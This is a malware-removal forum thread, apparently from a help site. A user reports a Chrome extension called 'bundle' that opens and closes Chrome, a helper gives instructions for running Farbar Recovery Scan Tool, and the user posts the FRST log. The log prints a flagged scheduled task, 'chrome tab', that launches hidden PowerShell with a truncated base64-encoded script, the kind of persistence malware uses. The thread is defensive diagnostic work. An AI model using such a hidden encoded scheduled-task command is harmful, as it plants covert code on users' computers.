
Bundle chrome extension


  • This topic is locked
27 replies to this topic

#1 miggybruh


Posted 16 July 2022 - 12:55 AM

Hello, recently I have been having issues with a Chrome extension called bundle that opens and closes Chrome randomly, and it gets very annoying. I would love it if someone could help me fix this in a timely manner. Thank you in advance.


#2 axe0

  • Malware Response Team

Posted 16 July 2022 - 01:56 AM

Hi there,

I am axe0 and I will be helping you with your computer problems.

Please follow these rules

  • Refrain from making changes to your system, unless instructed to, so I know the exact state of your system. This includes installing or uninstalling programs, deleting files, modifying the registry, running scanners or tools of any kind.
  • Follow the provided instructions in the order they are posted.
  • If you have any problem with a tool or instructions, or have questions, please stop and ask me before moving on.
  • Do not run any tool more than once, unless instructed to.
  • Copy and paste log files inside your reply, unless otherwise instructed.
  • Make sure to use Notepad for all logs, and ensure Word wrap is unchecked. In Notepad, click Format and uncheck Word wrap if it is checked.
  • Share as many details about your problem as possible, the more you share the easier it will be to solve your problem.
  • I may not reply immediately because these logs can take some time to analyze. If it takes more than 48 hours you'll be notified. Feel free to PM me with a link to your thread if you haven't received a reply after 48 hours.
  • Please try to reply within 24 up to 48 hours to ensure quick and efficient removal of malware. If there's no response from you within 3 days, I will bump your thread. If there hasn't been a response from you after 5 days then your thread will be closed.
  • Stick with me until the end to ensure there are no remnants of malware left. When there is no malware present you will get a confirmation from me.

 

----------------------------------------------

FRST logs
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Right-click FRST then click "Run as administrator".
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt and Addition.txt in the same directory the tool was run from.
  • Please copy and paste both logs in your next reply.


===============================================

In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
  • Content of FRST.txt
  • Content of Addition.txt


Kind regards,
Axe0

#3 miggybruh

  • Topic Starter

Posted 16 July 2022 - 02:23 PM

Here are my FRST.txt results:

==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Origin\Origin.exe ->) (Electronic Arts, Inc. -> ) C:\Program Files (x86)\Origin\QtWebEngineProcess.exe <3>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Globalhop Ltd -> ) C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.5.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_11.2205.23.0_x64__8wekyb3d8bbwe\Time.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBar.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32699856 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [RestMinder] => C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.114\Installer\chrmstp.exe [2022-07-04] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
 
Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
 
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2021-07-09]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-15]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
 
Chrome: 
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-16]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-06-14]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2020-07-31]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11152008 2022-07-14] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10452496 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
